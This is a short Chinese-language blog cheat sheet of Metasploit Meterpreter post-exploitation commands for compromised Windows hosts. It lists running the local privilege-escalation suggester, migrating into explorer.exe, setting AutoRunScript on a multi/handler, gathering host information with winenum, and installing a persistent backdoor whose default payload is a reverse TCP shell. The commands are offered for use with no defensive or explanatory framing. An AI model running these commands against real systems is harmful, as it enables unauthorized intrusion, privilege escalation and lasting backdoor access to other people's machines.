搬迁到Minggle’Blog
###本地提权漏洞检测
meterpreter > run post/multi/recon/local_exploit_suggester
###迁移到指定进程
migrate -N explorer.exe
###自动脚本
msf exploit(multi/handler) > set AutoRunScript migrate -n explorer.exe
msf exploit(multi/handler) > setInitialAutoRunScript migrate -n explorer.exe
msf exploit(multi/handler) > set AutoRunScript post/windows/gather/dumplinks ##migrate 到指定用户进程
###信息收集
meterpreter > run winenum
###持久后门
meterpreter > run persistence -h
OPTIONS:
-A Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt> Location in target host to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tc